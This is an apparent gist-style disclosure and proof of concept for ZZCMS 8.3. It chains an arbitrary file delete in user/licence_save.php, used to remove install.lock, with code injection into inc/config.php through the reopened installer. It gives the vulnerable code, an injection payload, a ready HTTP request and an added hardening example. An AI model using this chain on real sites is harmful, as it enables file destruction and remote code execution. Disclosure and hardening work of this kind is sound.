@Lz1y
Last active August 24, 2018 11:54
zzcms_File_Delete_to_Code_Execution_2

PoC by Lz1y

ZZCMS latest version download page:

http://www.zzcms.net/about/6.htm

zip installer:

http://www.zzcms.net/download/zzcms8.3.zip

Vulnerable code:

in user/licence_save.php, lines 15-42:

<?php
if( isset($_GET["page"]) && $_GET["page"]!="") {$page=$_GET['page'];}else{$page=1;}
checkid($page,0);
$title=trim($_POST["title"]);
$img=trim($_POST["img"]);
if ($_GET["action"]=="add"){
query("Insert into zzcms_licence(title,img,editor,sendtime) values('$title','$img','$username','".date('Y-m-d H:i:s')."')") ;
}elseif ($_GET["action"]=="modify"){
$oldimg=trim($_POST["oldimg"]);
$id=$_POST["id"];
if ($id=="" || is_numeric($id)==false){
$FoundErr=1;
$ErrMsg="<li>". $f_array[0]."</li>";
WriteErrMsg($ErrMsg);
}else{
query("update zzcms_licence set title='$title',img='$img',sendtime='".date('Y-m-d H:i:s')."',passed=0 where id='$id'");
if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
$f="../".$oldimg;
if (file_exists($f)){
unlink($f);
}
$fs="../".str_replace(".","_small.",$oldimg)."";
if (file_exists($fs)){
unlink($fs);
}
}
}
}

When action ($_GET["action"]) is "modify", $oldimg ($_POST["oldimg"]) is prefixed with "../" and handed straight to unlink() with no check on where it points, so an attacker can delete any file the web server process is allowed to remove, for example /install/install.lock. The only conditions are that id is numeric and that img differs from oldimg (the PoC below satisfies both by sending id=1 and omitting img). With the lock file gone the installer is reachable again, so let's look at the code in /install/index.php:

<?php 
session_cache_limiter('private, must-revalidate');  // needed so the browser can go back to the previous step; must come before session_start()
if(!isset($_SESSION)){session_start();} 
//error_reporting(0);
//set_magic_quotes_runtime(0);// no longer supported after PHP 5.3
include '../inc/config.php';
include 'conn.php';
if($_POST) extract($_POST, EXTR_SKIP);// registers each array key as a variable, e.g. $_POST['ai'] becomes $ai
if($_GET) extract($_GET, EXTR_SKIP);
$submit = isset($_POST['submit']) ? true : false;
$step = isset($_POST['step']) ? $_POST['step'] : 1;

...
#line 105-116
		$fp="../inc/config.php";
		$f = fopen($fp,'r');
		$str = fread($f,filesize($fp));
		fclose($f);
		$str=str_replace("define('sqlhost','".sqlhost."')","define('sqlhost','$db_host')",$str) ;
		$str=str_replace("define('sqlport','".sqlport."')","define('sqlport','$db_port')",$str) ;
		$str=str_replace("define('sqldb','".sqldb."')","define('sqldb','$db_name')",$str) ;
		$str=str_replace("define('sqluser','".sqluser."')","define('sqluser','$db_user')",$str) ;
		$str=str_replace("define('sqlpwd','".sqlpwd."')","define('sqlpwd','$db_pass')",$str) ;
		$str=str_replace("define('siteurl','".siteurl."')","define('siteurl','$url')",$str) ;
		$str=str_replace("define('logourl','".logourl."')","define('logourl','$url/image/logo.png')",$str) ;
		$f=fopen($fp,"w+");// see the fopen() documentation for the other modes
...

Because of `if($_GET) extract($_GET, EXTR_SKIP);`, every query-string parameter becomes a PHP variable, including $url, which str_replace() then writes into inc/config.php without any escaping. A value such as ?url=');phpinfo();// turns the siteurl line into define('siteurl','');phpinfo();//'), and the injected phpinfo() runs every time inc/config.php is included.

So deleting install.lock turns the arbitrary file delete into code execution.
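The chain has two root causes: the unchecked path passed to unlink() in user/licence_save.php, and the unescaped write of $url into inc/config.php in install/index.php. The following is an added example of how both sinks can be hardened; it is not zzcms code, and the upload directory name uploadimg and the function names delete_user_image, validated_site_url, config_define_line and render_config are assumptions made for illustration.

```php
<?php
// Added example, not zzcms code. The directory name "uploadimg" and every
// function name below are assumptions made for illustration.

// --- 1. Arbitrary file delete (user/licence_save.php) ---------------------
// The original code runs unlink("../" . $oldimg) for any client-supplied
// $oldimg. Here the path must resolve, via realpath(), to a file inside the
// upload directory, so "install/install.lock" or "../inc/config.php" is
// rejected even when the string itself contains no obvious traversal.
function delete_user_image(string $oldimg): bool
{
    $root = realpath(__DIR__ . '/../uploadimg');   // assumed upload dir
    if ($root === false) {
        return false;   // fail closed: a missing root must not degrade to "/"
    }
    // One plain file name with a single dot; this also keeps the "_small."
    // variant derived below unambiguous.
    if (!preg_match('#^/?uploadimg/[A-Za-z0-9_\-]+\.(jpe?g|png|gif)$#', $oldimg)) {
        return false;
    }
    foreach ([$oldimg, str_replace('.', '_small.', $oldimg)] as $rel) {
        $abs = realpath(__DIR__ . '/../' . ltrim($rel, '/'));
        if ($abs === false || !is_file($abs)) {
            continue;   // nothing to delete
        }
        // realpath() has resolved ".." and symlinks; the result must still
        // start with the upload root.
        if (strpos($abs, $root . DIRECTORY_SEPARATOR) !== 0) {
            return false;
        }
        unlink($abs);
    }
    return true;
}

// --- 2. Code injection into inc/config.php (install/index.php) ------------
// The original code registers every GET/POST parameter as a variable with
// extract() and splices $url into PHP source with str_replace(). Read the
// field explicitly and accept only an http(s) URL.
function validated_site_url(array $post): ?string
{
    $url = $post['url'] ?? '';
    if (filter_var($url, FILTER_VALIDATE_URL) === false
        || !preg_match('#^https?://#i', $url)) {
        return null;
    }
    return rtrim($url, '/');
}

// Emit each setting with var_export(), which produces a correctly quoted
// PHP string literal: a quote inside the value is escaped, so it cannot
// terminate the literal and start a new statement.
function config_define_line(string $name, $value): string
{
    if (!preg_match('/^[a-z]+$/', $name)) {
        throw new InvalidArgumentException("bad setting name: $name");
    }
    return 'define(' . var_export($name, true) . ', ' . var_export($value, true) . ');';
}

function render_config(array $settings): string
{
    $lines = ['<?php'];
    foreach ($settings as $name => $value) {
        $lines[] = config_define_line($name, $value);
    }
    return implode("\n", $lines) . "\n";
}

// Demonstration with the payload from this write-up.
$payload = "');phpinfo();//";
echo config_define_line('siteurl', $payload), "\n";
echo render_config([
    'sqlhost' => 'localhost',
    'sqlport' => '3306',
    'siteurl' => validated_site_url(['url' => $payload]) ?? 'http://localhost',
]);
```

The realpath() containment check is what actually stops the traversal; the regex is defence in depth. The stronger fix for the delete is not to trust oldimg from the client at all and instead read the stored image path for that id (and its owner) from zzcms_licence. For the installer, var_export() renders the payload as the literal '\');phpinfo();//', so it stays a string, and validated_site_url() rejects it outright; beyond that, an install.lock check is only as strong as the weakest arbitrary-delete bug on the site, so removing or blocking the /install directory after setup matters as well.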

POC:

POST /user/licence_save.php?action=modify HTTP/1.1
Host: lzy.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Cookie: PHPSESSID=; XDEBUG_SESSION=PHPSTORM
Connection: close
Upgrade-Insecure-Requests: 1

id=1&oldimg=install/install.lock